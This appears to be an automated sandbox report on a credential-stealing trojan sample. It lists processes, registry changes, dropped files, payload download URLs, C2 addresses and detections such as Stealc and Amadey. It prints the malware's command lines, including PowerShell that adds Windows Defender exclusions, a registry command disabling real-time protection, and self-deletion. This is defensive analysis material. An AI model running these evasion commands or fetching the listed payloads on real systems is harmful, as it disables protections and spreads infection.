  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - 0013737115.exe (PID: 2484)
  - Utsysc.exe (PID: 2472)
  - OgowUitadx4J3D0Zle3jzlME.exe (PID: 2412)
  - Install.exe (PID: 2992)
  - VqAZY2Gsltzix48asvMIup6y.exe (PID: 2380)
  - Install.exe (PID: 1728)
- Checks proxy server information
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - Utsysc.exe (PID: 2472)
  - rundll32.exe (PID: 2788)
  - rundll32.exe (PID: 2280)
  - rundll32.exe (PID: 2772)
  - rundll32.exe (PID: 1180)
- Reads product name
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Reads CPU info
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- The executable file from the user directory is run by the CMD process
  - 0013737115.exe (PID: 2484)
- Creates files in the program directory
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - VqAZY2Gsltzix48asvMIup6y.exe (PID: 2380)
- Manual execution by a user
  - dllhost.exe (PID: 1672)
- Drops the executable file immediately after the start
  - explorer.exe (PID: 1944)
- Reads the Internet Settings
  - explorer.exe (PID: 1944)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

OnlyLogger

(PID) Process(2728) D8CyX1GPoa6iBwqhMctvb7Yb.exe

C285.209.11.204

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (49.4)
.scr	\|	Windows screen saver (23.4)
.dll	\|	Win32 Dynamic Link Library (generic) (11.7)
.exe	\|	Win32 Executable (generic) (8)
.exe	\|	Generic Win/DOS Executable (3.5)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2023:11:07 19:07:31+01:00
ImageFileCharacteristics:	Executable, Large address aware
PEType:	PE32
LinkerVersion:	48
CodeSize:	433075
InitializedDataSize:	3584
UninitializedDataSize:	-
EntryPoint:	0x6bbad
OSVersion:	4
ImageVersion:	-
SubsystemVersion:	4
Subsystem:	Windows GUI
FileVersionNumber:	6.34.311.48
ProductVersionNumber:	6.34.311.48
FileFlagsMask:	0x003f
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	Neutral
CharacterSet:	Unicode
CompanyName:	IWaYiCOgA
FileDescription:	AvOvEma AKiJoAaGI eUUwUNaAiwE AKeuIkiv EVAfA uzUlaLu edayu OLEPuP.
FileVersion:	6.34.311.48
InternalName:	AnAZUXoX
LegalCopyright:	© 2023 IWaYiCOgA.
OriginalFileName:	aEoJOoA
ProductName:	iEOKapuooy
ProductVersion:	6.34.311.48
Comments:	OhaOOb UhiVoVi uTInusA IPok EDeHiI isedOcOj aOExIV oqIJeNeu IrOraIExU.

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

184

Monitored processes

104

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

272

schtasks /run /I /tn "gnCnaXtVw"

C:\Windows\SysWOW64\schtasks.exe

—

jlBQQYw.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

304

sc stop UsoSvc

C:\Windows\System32\sc.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

A tool to aid in developing services for WindowsNT

Exit code:

1060

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

312

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

—

jlBQQYw.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

364

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Power Settings Command-Line Tool

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

364

C:\Users\admin\AppData\Roaming\evhtujv

—

taskeng.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\roaming\evhtujv
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

392

"C:\Windows\System32\cmd.exe" /c taskkill /im "D8CyX1GPoa6iBwqhMctvb7Yb.exe" /f & erase "C:\Users\admin\Pictures\D8CyX1GPoa6iBwqhMctvb7Yb.exe" & exit

C:\Windows\SysWOW64\cmd.exe

—

D8CyX1GPoa6iBwqhMctvb7Yb.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1040

C:\Windows\explorer.exe

explorer.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows Explorer

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\temp\fmuxutjjwbws.tmp
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\psapi.dll

1172

sc stop bits

C:\Windows\System32\sc.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

A tool to aid in developing services for WindowsNT

Exit code:

1062

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

1172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

Add for printing

Total events

29 900

Read events

29 375

Write events

524

Delete events

Modification events


(PID) Process:	(1944) explorer.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:	write	Name:	CheckSetting
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB01000000088AF72B0747534094337F63DE35C94A000000000200000000001066000000010000200000003A7AE26404D75DF41C31FF40C5EA8CE90BAF74FA9E9BD7A9ACA34C7048350C1E000000000E8000000002000020000000BD2D56D46506C12C41A6A70B10E79EE53CB79EF36FD2BA8CDD2460CB8F4BE86A300000009B5D1418CBF2EB49F3C4BD4C21D58CA55B82FA3D3ED08AF0EF59D6C7ECAFC1055FA323A80FF7C154B1C9B60253392B6640000000DED9FDCC168073324C3013F1BB125E066EB1A2F09FD2C8E7CC7A793AA992E21EF1C942BF7294D04E036428704009B863B1CB981B97312E2530E3E816780CF7C9
(PID) Process:	(2704) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(2704) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(2704) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(2704) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(2844) CasPol.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(2844) CasPol.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(2844) CasPol.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(2844) CasPol.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(2844) CasPol.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2672	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:446DD1CF97EABA21CF14D03AEBC79F27	SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2844	CasPol.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D8FAl457U5bCf5zN8QZJfdW0.bat		text
		MD5:9B52BC1EF96ECFCDAB70EFAD917080A2	SHA256:5B394A3A573BA7009F7C3FC1A4C24C0BC25A7D180CD7F378961F349654A83004
2844	CasPol.exe	C:\Users\admin\AppData\Local\Temp\CabA550.tmp		compressed
		MD5:F3441B8572AAE8801C04F3060B550443	SHA256:6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF
2844	CasPol.exe	C:\Users\admin\Pictures\RWlihhQI7QHeNvZRPl4C0WZD.exe		html
		MD5:FCAD815E470706329E4E327194ACC07C	SHA256:280D939A66A0107297091B3B6F86D6529EF6FAC222A85DBC82822C3D5DC372B8
2844	CasPol.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506		binary
		MD5:FBE74E047A8FAAF5BE871C72184213BC	SHA256:6592FC26FCB110DF2D7367AA1DEBE907F285B12C209757E8FADF7EF98841BB62
2844	CasPol.exe	C:\Users\admin\AppData\Local\Temp\TarA551.tmp		binary
		MD5:9441737383D21192400ECA82FDA910EC	SHA256:BC3A6E84E41FAEB57E7C21AA3B60C2A64777107009727C5B7C0ED8FE658909E5
2844	CasPol.exe	C:\Users\admin\AppData\Local\DUvvCKVjlPtPSXZwoSFOyVAM.exe		executable
		MD5:4956D7A8E55535818CDF4B4CAE2F5D9D	SHA256:41B4E573F2950C49813A6596319399C0BCDC12CC881AF60918DE5BE0AB35C249
2844	CasPol.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjrN1PA9HOUA18NRXNvPsjWy.bat		text
		MD5:7713AE456648E6C9A9D782950D412929	SHA256:BDE497C375A8EAA2B87F837ABCE181D2C882377A68154C33D7004232F7433427
2844	CasPol.exe	C:\Users\admin\AppData\Local\NRTQdCKqJAsb5bmvTx2NkLge.exe		executable
		MD5:5AB2B28BC1E00519DCD55B67E9198C2C	SHA256:D8CA36406BFACDD794CC8BBC54F38B1C88116F1A180D4D069C3AD4A2210EF2F4
2844	CasPol.exe	C:\Users\admin\Pictures\LHYhRKOrUi44QbBSQySt1MAJ.exe		executable
		MD5:4956D7A8E55535818CDF4B4CAE2F5D9D	SHA256:41B4E573F2950C49813A6596319399C0BCDC12CC881AF60918DE5BE0AB35C249

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

116

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2844	CasPol.exe	GET	—	5.42.67.10:80	http://5.42.67.10/setupdownload.exe	unknown	—	—	—
2844	CasPol.exe	GET	—	194.49.94.67:80	http://194.49.94.67/files/My2.exe	unknown	—	—	—
2800	LgZETwjBuyt3U7y3AtTrHm4V.exe	GET	200	116.203.165.60:2087	http://116.203.165.60:2087/	unknown	—	—	—
2844	CasPol.exe	GET	200	95.140.236.128:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?56e02b563dbccaec	unknown	compressed	61.6 Kb	—
2844	CasPol.exe	GET	200	95.140.236.128:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7ac514a272f19814	unknown	compressed	61.6 Kb	—
2728	D8CyX1GPoa6iBwqhMctvb7Yb.exe	GET	200	85.209.11.204:80	http://85.209.11.204/ip.php	unknown	text	13 b	—
2844	CasPol.exe	GET	200	85.209.11.204:80	http://85.209.11.204/api/files/software/s5.exe	unknown	executable	387 Kb	—
2844	CasPol.exe	GET	200	95.140.236.128:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4e8985cacbd3f720	unknown	compressed	61.6 Kb	—
2844	CasPol.exe	GET	301	185.26.182.111:80	http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767	unknown	html	162 b	—
2844	CasPol.exe	GET	200	95.140.236.128:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a8f56d5b3bea9253	unknown	compressed	61.6 Kb	—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2844	CasPol.exe	172.67.34.170:443	pastebin.com	CLOUDFLARENET	US	unknown
1956	svchost.exe	239.255.255.250:1900	—	—	—	unknown
4	System	192.168.100.255:137	—	—	—	unknown
2844	CasPol.exe	85.209.11.204:80	—	LLC Baxet	RU	unknown
2844	CasPol.exe	172.67.180.173:443	potatogoose.com	CLOUDFLARENET	US	unknown
2844	CasPol.exe	172.67.216.81:443	flyawayaero.net	CLOUDFLARENET	US	unknown
2844	CasPol.exe	95.140.236.128:80	ctldl.windowsupdate.com	LLNW	US	unknown
2844	CasPol.exe	194.49.94.85:443	632432.space	Enes Koken	DE	unknown
2844	CasPol.exe	104.21.32.208:443	lycheepanel.info	CLOUDFLARENET	—	unknown
2844	CasPol.exe	194.49.94.67:80	—	Enes Koken	DE	unknown

DNS requests

Domain	IP	Reputation
pastebin.com	172.67.34.170 104.20.68.143 104.20.67.143	unknown
flyawayaero.net	172.67.216.81 104.21.93.225	unknown
gobo11fc.top	89.191.234.21	unknown
632432.space	194.49.94.85	unknown
galandskiyher5.com	95.214.26.28	unknown
lycheepanel.info	104.21.32.208 172.67.187.122	unknown
net.geo.opera.com	185.26.182.111 185.26.182.112	unknown
globalsystemperu.com	179.61.12.110	unknown
yip.su	188.114.97.3 188.114.96.3	unknown
potatogoose.com	172.67.180.173 104.21.35.235	unknown

Threats

PID	Process	Class	Message
—	—	Potentially Bad Traffic	ET DNS Query to a *.top domain - Likely Hostile
—	—	Potentially Bad Traffic	ET DNS Query for .su TLD (Soviet Union) Often Malware Related
—	—	Potential Corporate Privacy Violation	AV POLICY HTTP request for .exe file with no User-Agent
—	—	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
—	—	Potential Corporate Privacy Violation	AV POLICY HTTP request for .exe file with no User-Agent
—	—	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
—	—	Potentially Bad Traffic	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
—	—	Misc activity	ET INFO Packed Executable Download
—	—	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
—	—	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response

13 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942

65ACBF192DDEF924085504F07E559AD7

991FFA6FAE12E521118BF1800FB9D534037C04FC

CCCC4690ACE16E44F44473C2DF179B5B17E27F863B33ABDA126199014CB224D8

6144:lWtuykMCEGs7e4IaLLWCfxMRhU+G36vzgymktD2FqJFCS7tQPD7f8u4GnfF5Kuwj:otuykbEGs7e4IWyCob6LHEB5rMT

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Adds path to the Windows Defender exclusion list

Create files in the Startup directory

Drops the executable file immediately after the start

GCLEANER has been detected (SURICATA)

STEALC has been detected (SURICATA)

Connects to the CnC server

Runs injected code in another process

Steals credentials

RHADAMANTHYS has been detected (SURICATA)

Application was injected by another process

Changes the autorun value in the registry

Uses Task Scheduler to run other applications

AMADEY has been detected (SURICATA)

Steals credentials from Web Browsers

ONLYLOGGER has been detected (YARA)

Run PowerShell with an invisible window

Starts CMD.EXE for self-deleting

Actions looks like stealing of personal data

Unusual connection from system programs

Modifies hosts file to block updates

Creates a writable file the system directory

Neoreklami has been detected

SMOKE has been detected (SURICATA)

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

Reads the Internet Settings

Connects to the server without a host name

Script adds exclusion path to Windows Defender

Reads settings of System Certificates

Application launched itself

Reads security settings of Internet Explorer

Checks Windows Trust Settings

Connects to unusual port

Process requests binary or script from the Internet

Process communicates with Telegram (possibly using it as an attacker's C2 server)

Searches for installed software

The process checks if it is being run in the virtual environment

Starts CMD.EXE for commands execution

The process drops Mozilla's DLL files

Starts itself from another location

The process drops C-runtime libraries

Drops 7-zip archiver for unpacking

Reads browser cookies

Process drops legitimate windows executable

Reads the BIOS version

Found strings related to reading or modifying Windows Defender settings

Uses REG/REGEDIT.EXE to modify registry

Loads DLL from Mozilla Firefox

Accesses Microsoft Outlook profiles

The process executes via Task Scheduler

Uses TIMEOUT.EXE to delay execution

Uses NETSH.EXE to obtain data on the network

Uses RUNDLL32.EXE to load library

Starts SC.EXE for service management

Uses powercfg.exe to modify the power settings

Executes as Windows Service

Uses TASKKILL.EXE to kill process

Unusual connection from system programs

Drops a system driver (possible attempt to evade defenses)

The Powershell connects to the Internet

Starts application with an unusual extension

INFO

Checks supported languages

Reads the computer name

Reads Environment values

Reads the machine GUID from the registry

Creates files or folders in the user directory

Create files in a temporary directory

Checks proxy server information